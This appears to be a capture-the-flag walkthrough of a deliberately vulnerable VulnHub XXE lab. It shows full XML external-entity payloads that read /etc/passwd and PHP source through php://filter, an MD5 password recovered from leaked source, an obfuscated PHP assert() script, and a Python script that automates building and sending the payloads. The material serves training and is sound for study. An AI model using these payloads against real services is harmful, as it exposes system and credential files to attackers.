
【攻略鴨】XXE Lab 1 VulnHub target walkthrough

2023-01-06 11:06 Author: 攻略鴨

The content of this article is purely fictional; please follow and like 攻略鴨 on Bilibili for support!

Target address (found with arp-scan on the lab network):

$ sudo arp-scan -l
192.168.221.151

http://192.168.221.151/xxe/

External reconnaissance

Port scan (nmap output; robots.txt lists two disallowed entries, which are the first leads):

80/tcp   open  http    syn-ack ttl 64 Apache httpd 2.4.27 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/xxe/* /admin.php
5355/tcp open  llmnr   syn-ack ttl 1

Website information

The page at /xxe/ shows a login form. Submit it and capture the request; the form is posted as an XML document rather than as form fields, which is what makes XXE worth testing:

POST /xxe/xxe.php HTTP/1.1
Host: 192.168.221.151
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain;charset=UTF-8
Content-Length: 95
Origin: http://192.168.221.151
Connection: close
Referer: http://192.168.221.151/xxe/

<?xml version="1.0" encoding="UTF-8"?><root><name>tester</name><password>test</password></root>

Modify the request to test for XXE: declare an external entity pointing at /etc/passwd and reference it in the <name> element, which the page reflects back. (The DOCTYPE names an element r while the document root is root; libxml does not validate against the DTD by default, so the mismatch does not matter.)

POST /xxe/xxe.php HTTP/1.1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY tester SYSTEM "file:///etc/passwd">
]>
<root><name>&tester;</name><password>test</password></root>

Response (the entity content is reflected in place of the name):

root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
xxx part omitted xxx
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
syslog:x:104:108::/home/syslog:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
_apt:x:106:65534::/nonexistent:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
r00t:x:1000:1000:Administrator,,,:/home/r00t:/bin/bash

This confirms the XXE vulnerability: the parser resolves external entities and the application echoes the resolved content. The last line also reveals a local user, r00t.

XXE exploitation

Requesting http://192.168.221.151/admin.php (the path listed in robots.txt) directly returns 404.

Use the XXE to read PHP source instead. Two details matter here: the php://filter wrapper with convert.base64-encode is used because raw PHP source contains characters (<, &, quotes) that would make the entity content non-well-formed XML and break the parse; and the relative resource path admin.php is resolved against the working directory of xxe.php, i.e. the /xxe/ directory, which is why it is readable here even though /admin.php at the web root returned 404:

<!ENTITY tester SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">

返回值Base64解碼后主要內(nèi)容為:

<?php
   $msg = '';
   if (isset($_POST['login']) && !empty($_POST['username'])
       && !empty($_POST['password'])) {

       if ($_POST['username'] == 'administhebest' &&
           md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609') {
           $_SESSION['valid'] = true;
           $_SESSION['timeout'] = time();
           $_SESSION['username'] = 'administhebest';

           echo "You have entered valid use name and password <br />";
           $flag = "Here is the <a style='color:FF0000;' href='/flagmeout.php'>Flag</a>";
           echo $flag;
       } else {
           $msg = 'Maybe Later';
       }
   }
?>
</div> <!-- W00t/W00t -->

Collecting the information from the source above:

Flag location: /flagmeout.php
username: administhebest
password: admin@123 (md5: e6e061838856bf47e1de730719fb2609, recovered by cracking the hash)
W00t/W00t (the HTML comment after the form; kept as a possible hint)

Use the same XXE to read flagmeout.php, again base64-encoded through php://filter:

<!ENTITY tester SYSTEM "php://filter/read=convert.base64-encode/resource=flagmeout.php">

返回值Base64解碼后為:

<?php
$flag = "<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->";
echo $flag;
?>

The comment points at the real flag location, encoded twice. The 32-character string JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5 uses only the Base32 alphabet (A-Z, 2-7); Base32-decoding it gives L2V0Yy8uZmxhZy5waHA=, which is Base64, and Base64-decoding that gives the path /etc/.flag.php.

Use the XXE to read /etc/.flag.php. The file is outside the web root but the entity is resolved by the PHP process, so any file www-data can read is reachable:

<!ENTITY tester SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">

Base64-decoding the response gives:

$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$à=+_;$á=$?=$?=$?=$?=$è=$é=$ê=$?=++$á[];$?++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$è++;$è++;$è++;$è++;$è++;$é++;$é++;$é++;$é++;$é++;$é++;$ê++;$ê++;$ê++;$ê++;$ê++;$ê++;$ê++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$__('$_="'.$___.$á.$?.$?.$___.$á.$à.$á.$___.$á.$à.$è.$___.$á.$à.$?.$___.$á.$?.$?.$___.$á.$?.$à.$___.$á.$é.$?.$___.$á.$é.$à.$___.$á.$é.$à.$___.$á.$?.$?.$___.$á.$?.$é.$___.$á.$?.$á.$___.$á.$è.$?.$___.$á.$?.$é.$___.$á.$è.$?.$___.$á.$?.$é.$___.$á.$?.$é.$___.$á.$?.$?.$___.$á.$?.$á.$___.$á.$è.$?.$___.$á.$é.$á.$___.$á.$é.$?.'"');$__($_);

Prepend <?php to the script and run it to get the flag: SAFCSP{xxe_is_so_easy}

A caveat before running an obfuscated script like this blindly: the intact prefix already shows what it does. $_[]++;$_[]=$_._; builds the array [1, "Array_"], the character arithmetic that follows assembles the string "AssErt" (PHP function names are case-insensitive, so $__ is assert()), and the final $__('$_="'.$___. ... .'"');$__($_); passes a string of octal escape sequences (\1dd) to assert(), which in PHP 7 evaluates a string argument as code, and then asserts the decoded string a second time. Whatever that string decodes to runs with your privileges. To see it without executing it, replace the final $__($_); with echo $_; and run under PHP 7 (the bare constant _ is an Error in PHP 8, so the script does not run there anyway).
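As an added example (not code from the original post or from the lab), a Python script that wraps the exploitation steps above: building the XXE payload for an arbitrary file:// or php://filter resource, pulling the Base64 blob out of the reflected response, decoding the Base32-then-Base64 hint from flagmeout.php, and checking a candidate password against the MD5 hash found in admin.php. The lab is not reachable here, so the HTTP response used in the demo is a constructed sample; the real xxe.php reflects the name inside some HTML the post does not show, and the "longest Base64 run in the body" extraction is a heuristic that assumes nothing else on the page looks like a long Base64 string. send_payload() is provided for use against the real target and is not called in the offline demo.

```python
import base64
import hashlib
import re
import urllib.request

TARGET = "http://192.168.221.151/xxe/xxe.php"  # endpoint from the walkthrough
ADMIN_HASH = "e6e061838856bf47e1de730719fb2609"  # md5 found in admin.php


def build_payload(uri, entity="tester"):
    """XML body as posted by the login form, with an external entity pointing at `uri`
    referenced from <name>, the element the page reflects back."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE r [\n"
        "<!ELEMENT r ANY >\n"
        f'<!ENTITY {entity} SYSTEM "{uri}">\n'
        "]>\n"
        f"<root><name>&{entity};</name><password>test</password></root>"
    )


def filter_uri(path):
    """php://filter wrapper that Base64-encodes a file so that PHP source (which contains
    '<' and '&') survives the XML parse instead of breaking it."""
    return f"php://filter/read=convert.base64-encode/resource={path}"


def send_payload(uri, target=TARGET):
    """Post the payload with the same Content-Type the form used; returns the body.
    Not called in the offline demo below."""
    req = urllib.request.Request(
        target, data=build_payload(uri).encode(),
        headers={"Content-Type": "text/plain;charset=UTF-8"}, method="POST")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_filter_output(body):
    """Heuristic: the php://filter output is the longest Base64 run in the response."""
    runs = B64_RUN.findall(body)
    if not runs:
        raise ValueError("no Base64 run found in response")
    return base64.b64decode(max(runs, key=len)).decode("utf-8", "replace")


def extract_hint(php_source):
    """Pull the parenthesised Base32 token out of flagmeout.php's comment."""
    m = re.search(r"\(([A-Z2-7]+=*)\)", php_source)
    if not m:
        raise ValueError("no Base32 token in source")
    return m.group(1)


def decode_hint(hint):
    """Base32 -> Base64 -> path, the double encoding used by flagmeout.php."""
    inner = base64.b32decode(hint)          # b"L2V0Yy8uZmxhZy5waHA="
    return base64.b64decode(inner).decode()  # "/etc/.flag.php"


def crack_md5(target_hex, candidates):
    """Unsalted MD5 from admin.php: a plain wordlist check is enough."""
    for cand in candidates:
        if hashlib.md5(cand.encode()).hexdigest() == target_hex:
            return cand
    return None


# Constructed sample data (not captured from the lab): the source of flagmeout.php as
# printed in the walkthrough, wrapped in hypothetical HTML the way xxe.php might echo it.
FLAGMEOUT_SRC = (
    "<?php\n"
    '$flag = "<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->";\n'
    "echo $flag;\n"
    "?>\n"
)
SAMPLE_RESPONSE = (
    "<html><body>Hello <b>"
    + base64.b64encode(FLAGMEOUT_SRC.encode()).decode()
    + "</b>, welcome back.</body></html>"
)


def main():
    print(build_payload(filter_uri("admin.php")))
    src = decode_filter_output(SAMPLE_RESPONSE)
    hint = extract_hint(src)
    print("hint:", hint, "->", decode_hint(hint))
    print("admin password:", crack_md5(ADMIN_HASH, ["admin", "password", "admin@123"]))


if __name__ == "__main__":
    main()
```

Against the real target, replace the sample body with send_payload(filter_uri("flagmeout.php")) and feed the result to decode_filter_output(); the rest of the chain is unchanged.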
